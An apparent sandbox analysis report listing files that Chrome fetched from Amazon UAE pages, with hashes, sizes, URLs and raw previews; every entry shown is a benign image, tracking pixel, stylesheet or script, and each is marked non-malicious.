                                                                                                                                                                                                                                                                SHA-256:9A0A411DBB9C2F5A8763708AA4AB71F5B36F9BCD89476FB81D36DF14E4F3230C
                                                                                                                                                                                                                                                                SHA-512:C76FC93DD481C277F626F74CC30A26F9795F8D6354FF422E1A5320739454AAE0AB78CD22C25C8E58D893506ECE20573FE611C2589BAB2C85F03BBB45F9F33A11
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986215_UAE_Budget_Store_AE_xsite_bubbler_generic_en_400x400_2X._CB644457596_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................................;.................................................................................5.......Z.9....ao_..&..L..Th.}.c.W.'....]...V.................>>fPL+.z.......ee0.....z..l..mget&..L.z............>...[.zE...V.}..........8cw;}.].m/8.*.........../35......}w.,........P..+fR.6$...IO.X..9.%,sbI......E..F.}...........cf-/h7I.a.}M....d.*4.1t..lIO.X..:.%,ub..jX..&...A.....l0......5g.{..+......8....c..o|..{E.........e..=)..!.p........{[..@?D\.............6{.m..........{^..j...M........y..~..Y.Z.7g..O....k.......7Y.gI..........C.....iO.0....h?Kz...F.......d.ZN.8.... ......^~.....c.....A8.(x......2V..a.V..G2..K...o..D...,N...r.?=........M.~.4..t.[...*.<.~Rya...o.^.]B....r.fo.e.*.!......./......Q.........q|...Xs.b..r..p.}^9yW.6...e@.....6....z..@.......J.[`.o.M.g....n.......x7..uoj.t.N...rW.<..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9416
                                                                                                                                                                                                                                                                Entropy (8bit):7.858682165622051
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Yz5bN2/h9nsM4q9xe9XBfssssssssssLQkVts7uxjCG6IimDB:M2/yqbe7ssssssssssLQkVa7uxjZnDB
                                                                                                                                                                                                                                                                MD5:66FD5911E870575C02253E729B4DBEFE
                                                                                                                                                                                                                                                                SHA1:348414EAEBDB79AC5C031F2081FCD84FDF066C4B
                                                                                                                                                                                                                                                                SHA-256:D4E22F8480F3D391BF5CD2255CBA9CA5322CCDF7C5853671D6CC21FE12E870E6
                                                                                                                                                                                                                                                                SHA-512:70B7D7DC3F99D540A759148ABC81FB9CE7921FB2CE449B87129809F858427296C421A6E2869447744EF8FD4DC270A7980461F060C986423709972A0CBEFE166B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................................................................................................................."..........4...........................................................................x8.}W.=.).{r...-......{...............[}.. .........=..{..5..t.[).l."..........=..i.V.C`......=.....2..L...D:........4q...KD<......m,..Y.Y.....;..Vt..I>:\Mh#....Oy.....H$.......C...Q......%..9YVN....tyYR.....{=O<X......N~..nBH@....=.i.5......Mh..86.....f.._.'....?.0........z.}.......{sF..C`.....b-h...-.*.*........q.;...d.y.............'..].GP.........=..x.......x........W..H........Y.............`.......|...E...G.....@.......%..)w........~.N..r./(..a...G......oS.y..{......JaCT.........w.gI.X..N...F.^..w.....~n;.n}|..G.s.uC.>.......647..*.)..R......u..t...&..&..6..{.~8............)5 .Km.s..q......ZZS.].S\.y........]/7.gJ.....Z.[.px..:.....v...$......~g'U..._E .........k...{..|.........t......4;..<
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):12355
                                                                                                                                                                                                                                                                Entropy (8bit):7.928657781109876
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:+FjuGzAufh/Xbndxa85q2WHEpPUlBaj9vSybJ6lbQl1wqgG5PjALN1hJEYVH:PoB/X5Y8nWHEpPUPa18bQl1bzALZiAH
                                                                                                                                                                                                                                                                MD5:75A9BE19AD0997F6E761B2FA2394EE55
                                                                                                                                                                                                                                                                SHA1:EF0D49359BD32D457CD8E4F2A8B0D55D1D4E2CCF
                                                                                                                                                                                                                                                                SHA-256:2B503272AEA1EA4E4B3407CFC8094386BAE6ADF8F54206C1FA49AA47419F51A1
                                                                                                                                                                                                                                                                SHA-512:7296053870EDF12A63EAAFDFB73FEC55987D9DE3C92B45C3963948C3DCFE1E0EAC1F10279E38DFA52F879D936C6CF8B52C5C097B8BEAC898D2D3147262624B78
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5..................................................................X.....b....Xx.>.ys`U.4#/ ...qh....$~...y.....zn_3.b.x.]u.!._..~J.{.. K................o...e...=.....v...Y...S...X.Q...gm.{..7c.Q..F%...^N_.d4...U.a........4;..............n..~.~....sl..~..:Q.m1[?s.{>....../5.|....S....(..~......y.O....u.|.w0............7.G]....0...<.-e.o.G?/.......L..Z..i.Nc...a.3.\...y....d..v.2.W.zS.+D.0............!.m..:u.....Q....>......UE.!.l...5.B.bq..!..^..c..@............B.l..FO;>.........p.Iyjr.F.^js.!....S.f..j..oz.....g.~.s.#..09*.7.:.=}..3..."..}............o..=.i&....v;...oZV....o..~...C....umk..WN.~fn!y..W..^........D...<...Gg._y.......IN.y..b.~....x...........*..d..>....Ty..WK.:.g....d..../.9G........2...F^.M...,..uM.V..[..^............_B6.?..6u...........4.n.xX.1.S....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 199x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):13988
                                                                                                                                                                                                                                                                Entropy (8bit):7.962227892924529
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:LDT9TwUCqcbV9uW1r6qIj4/m5IhqvU7FYX:L/9TW9RrkpIgce
                                                                                                                                                                                                                                                                MD5:74F97F55C44E2FD30D59B50915C7F71C
                                                                                                                                                                                                                                                                SHA1:202D438E02936BDEBA68ECFC8AFAF2EFA08FBB18
                                                                                                                                                                                                                                                                SHA-256:E9BFF2A27CC9CE964292E793D9405DF7249967AC1CDB971C01655710B816B167
                                                                                                                                                                                                                                                                SHA-512:8073829F1510C696D24ED565B2271E0D971CE06BDD0D3832339BB5FD0D0D51B85BD56516294DBD3AE7E637D4BC31CBC3DB3242EC23CFF0F5032ED7270306C18C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!.."1.AQ.2aq#R....B......$CSTbrs...34Dt........................................................!1."A..Qaq.....#2...R....$Sb.C............?.n...'O3...T..}...'.R.\9K..JE<......El|...$7u$.qc..xeHY2.!.!.\q(...4..T....QV......F...B..,.x-x...:)..R.Gr.M2....-f...C.q.)8.....u....-3J..t....r..i.._.{.......kS'1Q....$KO..4;..+.... ...#..i#m@y....{...K.4\!..].}6...;w#..........TrH.3.k ........J#.,....o.......c.a1(..:.......6.RT..B.7.....R..d_.<7.8 . ..8..._N...Q#jX.e...o.[.q.,....A cM...Ldi$X.[.F..0:...T..;/.:G.6...k..9.Xs.(....K.........u5..q.\.....J*..\..'5.. x..B.Y.:..1u..Q-Ya..s....vA....d..b....S...K.WO.....S*..X.............S/..JHjYU.v)<@.....`..ei^.H.'. .c.5J....j......pi.n[....BM.......;..........sT..]...\.m3.o.*..8.h.@$..?#.M..R.#....X/.<B.H
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4586
                                                                                                                                                                                                                                                                Entropy (8bit):7.638456755561819
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TucqTo0/6BiiPNf6eJM6WO47pbPpgLVMX7xc88OMISldhA:KBTo0CsiPNf3M1O4+VMXFcVDlg
                                                                                                                                                                                                                                                                MD5:E82D142DD46592E5BE3D987AC1B19FEE
                                                                                                                                                                                                                                                                SHA1:C54A4F92E5EAFB3211648751C58EAD7AD8FD8D70
                                                                                                                                                                                                                                                                SHA-256:787FD53F51C68E96C80B79AEAE783A14E6CB56024EA0B30A865A46455FC14E2F
                                                                                                                                                                                                                                                                SHA-512:8BEA49867F9EDE54B7DEB9F5CC502BF7FB1607FA60E48243C4766A92394DC15883C62174EDD7776B5F06DB32F4B621B3CE8449866253F8DCDCDDABBBC8BF7F8C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........0.........................................................................D........p.;......................8....}_...]#c...................O.|........|o.Y...8..)..........%..................1....w...%.O....}...^'K..c...Yi......................?J.Vk.........$(..i...;...=.)|..[....lu..y@..............c.y.#....4...I...M,.^....m.....>..fI....#.(.............c/.z...N_T.[iK..)e..3WS.4.T.../{.h.x..b....p7..0..............75.,..a.[....x].1.]...SX.]..F]?..<e..}..{....q..S....zI.............Q.M}>..#.K9.../.u..r ....s...kD.........t....&cA...0.f0..M..5%.........j...o5...[.s...g9..........0l..;.......V]l.C-q...w..........j.E.rkz.....6..k=.h.8.V..kF..i.&;...@@.K.....t.............d.f.u..}...j.V...|y1..lDL.. .)z...c.C|.........h.j...c.\f8.L....l/L....V`Z....5..../h..r.".1..........i.....`
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:2T6Z4AC3VMBGX01C1EVN$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D2T6Z4AC3VMBGX01C1EVN%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D4533%26pc%3D7460%26at%3D7460%26t%3D1723469074826%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D2T6Z4AC3VMBGX01C1EVN%26aftb%3D1%26lob%3D0:7460
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:1
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (37608)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):369479
                                                                                                                                                                                                                                                                Entropy (8bit):5.0542643313877775
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:YeDhae/RAVHXnY22z8iS22f2PyFrmR/0dUORBf4TCP6QnO4TevPjhuujRdUOfVs1:3a/dUORBf4TCPAB7ohmIvpVBtfVyK
                                                                                                                                                                                                                                                                MD5:06ABFD403D5D335BF75AF508E0240906
                                                                                                                                                                                                                                                                SHA1:5A6B9BC61BC144D4D88EAD1BF753D3FDC1166130
                                                                                                                                                                                                                                                                SHA-256:67DB650AB77AD45E44B48EC7732D5C586AF10DDA7B131271B287D49104422AA2
                                                                                                                                                                                                                                                                SHA-512:A783E738C7814FB944AB6699869CCDD3B3853435A8A47BBE33617E103A3CBCC2B721070476D938F3FC2C429B51A77FF82982C4DD1755A963360AFAA6F1B7C227
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/41-WpIOxHtL._RC%7C71S7yoZEbpL.css,415rb7zC-GL.css,11GB7tDtz6L.css,31MqpFX13CL.css,31YZpDCYJPL.css,21pkK7OQMnL.css,41Xj8tZc2XL.css,110Nj+wUGYL.css,31OvHRW+XiL.css,01R53xsjpjL.css,11EKggV-DlL.css,415g7iDx4VL.css,11qTzxZ0Y5L.css_.css?AUIClients/NavDesktopUberAsset&JoiNCr6G"
                                                                                                                                                                                                                                                                Preview:#accountMenu-container,#hmenu-container{position:fixed;top:0;left:0;right:0;bottom:0;visibility:hidden;z-index:100000}#accountMenu-container div,#hmenu-container div{display:flex}#accountMenu-container.hmenu-visible,#hmenu-container.hmenu-visible{visibility:visible}#accountMenu-container a,#accountMenu-container a:hover,#accountMenu-container a:link,#accountMenu-container a:visited,#hmenu-container a,#hmenu-container a:hover,#hmenu-container a:link,#hmenu-container a:visited{font-family:inherit}#accountMenu-container #accountMenu-canvas-background,#accountMenu-container #hmenu-canvas-background,#hmenu-container #accountMenu-canvas-background,#hmenu-container #hmenu-canvas-background{position:absolute;will-change:opacity;height:100%;width:100%;-webkit-tap-highlight-color:transparent}#accountMenu-container #accountMenu-canvas-background.hmenu-bkg-color,#accountMenu-container #hmenu-canvas-background.hmenu-bkg-color,#hmenu-container #accountMenu-canvas-background.hmenu-bkg-color,#hmenu-co
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6335
                                                                                                                                                                                                                                                                Entropy (8bit):7.9398937121925135
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:FgbxcG3Qv4LYburSb0FfeWO1ngr1P7czd+:FOT3dyurSboLAgrpIU
                                                                                                                                                                                                                                                                MD5:C6F03ECB4C2771A0D7A45A717290CBEB
                                                                                                                                                                                                                                                                SHA1:0CC1174CF7EE5432A55BE6A7BB21B18DE6B6180F
                                                                                                                                                                                                                                                                SHA-256:1753512470DBD1A5AFCA42C725B84D70E9AE8754F23234FD7742B42DA0E4094B
                                                                                                                                                                                                                                                                SHA-512:2AB7B9A3C56460C7CC0F6329188A8D9FDC7094681A00338F0FBA57C050A78FBF6047998A81892B4A2306F21813F36D0DE3F75BEEACB08844FF2D6652021B8FF2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!1.AQ."aq..2..BR.......4Sbr...$3Cs.#...Tt....................................................!1.A.."Q....B......2Saq.#CR................?..$...I.W..73.....hE...!.43..QR....&.M..:..sBh..!.a..PjM...0.......9.._L:..VTI.X..w&*?.....v'.iw..h.o3.@..'Q;H..[.r..M..i.M..o_.p.6.....r.....'M..J.of.b5`...q.#.].....3..gA3...~...E.PT....p.k...$j.j.x........:."..p..d..f$.=......p..n.5.N.3..)...].".f=..ds..j..i.?..IW....G[...U..v.u..."...#.\..:]x$....RT....A.....+.:........$e',e.l....Q.+.*9&.V$...I....XK....P...........2.... ...A.H.R...}.n.*..-.V...._._...u..5...t.2......#AQa....8.cw_...Zi..|.5...By.1..]o...Ta<.O.*E.E.z8......>4.....g...U.H..j<:EL.......R...1z.K.q@.DR..f!.C.0E.).5..9..h..Hf.FM/,..|.RF.....fi....Ka.......a...N.cO*.@.v.D..5..s.uq..O.=..k`..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1489
                                                                                                                                                                                                                                                                Entropy (8bit):7.1141970928897695
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:TRe+0CmzAft8w1y7i+eDuIA26h5IjuNQUuOpRlTo9O1FpNcQnrPgUEp1frVD:TT0rMfOO4dy6dh6EFRp/D1fNTroBx5D
                                                                                                                                                                                                                                                                MD5:13F41DFBD27EF1F585F6894C069F1F02
                                                                                                                                                                                                                                                                SHA1:380667C617B0C30F5EAE87FE011AE5ABA665BFEF
                                                                                                                                                                                                                                                                SHA-256:1D14FE9426109B1379B138E6549FB299661754DFD4823FEB8F67E34DC1A60FCD
                                                                                                                                                                                                                                                                SHA-512:2A1EADCABF84EE2A8EB3A1E09A149E0A7E83FD91C86E910881BF2E7CBB61668837E9E3BC12210C8BEE0D99679D170C58B7072EF90D1F4AA730AAF7C4EE31719C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........z...................................................1.!4As...5a.."$Bq...R....23Q.....................................................?...........Dt.l_gi..gv\...9../Y...ia.D.Ku.R:.?.(.O....;...>.q...!L...l.w...kO.......:w...Ku.~]....]:...[[.|.fU..L.....qi.^......l..-...;._.LuZ...!Y..V-....o.6../..:;...Y.......M....l_.m...g....6....|.w8..t.................g.-..i..~........6...."g..PB......1......~O..6.-..i......z=.[.S_g...}..;.?..K..N.....\o.m.1x.....pj.o..pLd.j.pO....-}.tB.vf..y..e...._.6..................S.r.4.1..s~.....!..'......u....v....7.b.m......z...S...........=.c......U....Oac._...\\7....n.}...-......O.......................].r.}!2..v.._HX<.y+...*...TT5|.4..u|.4....icS.qD....j...B..>..j.Y...................].r.}!4..v.._....^J...a..*)..o.nR.j.......yO..Z..a
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:M6RE43WFQNSF80R5MH23$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DM6RE43WFQNSF80R5MH23%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D4843%26at%3D4843%26t%3D1723469068779%26csmtags%3DstartVL%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DM6RE43WFQNSF80R5MH23%26aftb%3D1%26lob%3D1:4843
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4753
                                                                                                                                                                                                                                                                Entropy (8bit):7.898667717419798
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TftfZBtqKML1vey3Z+T5gAJtG4krwQMMZJlNhbHpDx2DbpV:rBt6vVCPWrwINhbJVqpV
                                                                                                                                                                                                                                                                MD5:13DCA9EE6C1EB92A7812690F14BF7CFE
                                                                                                                                                                                                                                                                SHA1:3A9F4823115F53592CC69AC4CEBBEF5A1FE6A6AE
                                                                                                                                                                                                                                                                SHA-256:925D88152EFBDB9518324FE7C1A4B76BE8B11F09435C32B7DBF3ECC3816A5C5D
                                                                                                                                                                                                                                                                SHA-512:9EFBBD147C4C1A9F710154EDAFC8BC2F5550A9401B5F30FC6EF124986A7E42944E3B8E7E695F216D8D0CFAB1E68A7817AFDCCD8AFBD19CF5E23460A80F9E28B0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/71b4SNq8EUL._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................1!AQ.."aq.2...Br....#CRb...34D.c...............................................1..!A.a............?..D@DD.EZv..[rm3!....!..N...A...a.9.9/5S.......T..Q.s.x.....;.|.....V.5...-EL..YM.#...z.....6.r...2m.....z..f..N.%m.......<...Bz...ho9...P>ez..X.w.W.......;}|Z)..$.{T[.9#..l....b.2..V...{.......xc...W/.lC*..a..#\~.2}.}E.....W9...73...........;g+.eDD@DD.D@DD.D@DD.D@DD.D@DD...>..c8.+U!....s..v....=.eX0\hOK.{_#...b[..........C~k.\...w..G.....t3...r..~.........Q6.p......e#...A....8..\..>#.h..C.).2.......V....+.]....5...g7a.......H...vFy=..YU...-Cj.$|2.i.l}.".0n.....S...!.*...;.v,M..h.!....F.........0G..T.D@DD.D@DD.D@DD.D@DD........*....H.zk...S}...l#.~..ISX...Mf.......X.wM#\H..:...G.p 8ji.<..&..i..T..../...)...<..tR..:FK...pE..J:.k.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (542)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):12254
                                                                                                                                                                                                                                                                Entropy (8bit):5.266663659098461
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:gqh6rMupPgt/hoSVEAmHto3GyZFP3RXFjFa4ZEFIvZPsi04ZqffOvZPEV1:gFV4HmN2ZXDjsvffgc
                                                                                                                                                                                                                                                                MD5:B5C854FA1E601BFD190CB9B1528F3BD3
                                                                                                                                                                                                                                                                SHA1:651DB75B7F37D4B41A326186B0685C2E1146002E
                                                                                                                                                                                                                                                                SHA-256:A65C65158FB5A78F9208B79EB060EB8F014176E73248632F57BEC7B325EFDE53
                                                                                                                                                                                                                                                                SHA-512:39F7DFCA7D57BB4DA70E01695D9A527CA5CED08170080F8C96F3196702D27C5D9F5EFB9238C534F1CCD753DBF48F8CDF23158D33EC087763E5B0B9E9B2DA842D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(e){var b=window.AmazonUIPageJS||window.P,t=b._namespace||b.attributeErrors,l=t?t("F3CommonCartAssets",""):b;l.guardFatal?l.guardFatal(e)(l,window):l.execute(function(){e(l,window)})})(function(e,b,t){function l(){var a=document.querySelector("#localMarketRecommendations");if(!a)return{};var d;return{preSuccessCallback:function(){d=a.getBoundingClientRect().top},successCallback:function(){var f=a.getBoundingClientRect().top-d;b.scroll(b.scrollX,b.scrollY+f)}}}e.when("A","F3CartSelectors",."localmarket-cart-actions","localmarket-accordion-view-state","localmarket-accordion-view-content").register("localmarket-accordion-view",function(a,d,f,m,e){function n(){var a=d.getOutOfStockElement();d.getSequentialCheckoutContainer()[0]?p(a[0],68):p(a[0],0)}function h(a,f){var g=d.getCollapsedCart(a),q=d.getCollapsedItemList(a),b=d.getAccordionItemList(a);e.isAccordionContentShown(a)&&0<g.length&&p(g[0],60);q.add(b).slideToggle(600,function(){m.enableToggling(a);f&&f()})}function k(a,f){f&
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):278
                                                                                                                                                                                                                                                                Entropy (8bit):5.142681738748829
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Qs73HgB/uIgGuIgVEhs6J9YM5UNb5IpDyXF0H1U:Z73ohb6eaIpUUU
                                                                                                                                                                                                                                                                MD5:7EA016ABB408E1ED228DE41AAFB3E547
                                                                                                                                                                                                                                                                SHA1:2CF0BF631026B9AD97A9B228A756BC4ABFF17950
                                                                                                                                                                                                                                                                SHA-256:4A6AA03D40B8D15D329DB1231CCFCEC2EF920925235A64BCF64DBE9B9BE11118
                                                                                                                                                                                                                                                                SHA-512:350255CDF7FC91301005FE962927592F047B0A4BC19FA90F57A5CD157C64F59B70EB737A0AF8D4A43C48A9DD0294D894D20C3EBEBACFA1EA26579F9ACB66C404
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:'use strict';mix_d("ZeitgeistNavFrontEndCards__p13n-zg-nav-tab-all:p13n-zg-nav-tab-all__lCNn05Si",["exports","tslib"],function(a,b){a._operationNames=[];a.card=function(){return b.__awaiter(void 0,void 0,void 0,function(){return b.__generator(this,function(c){return[2]})})}});.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
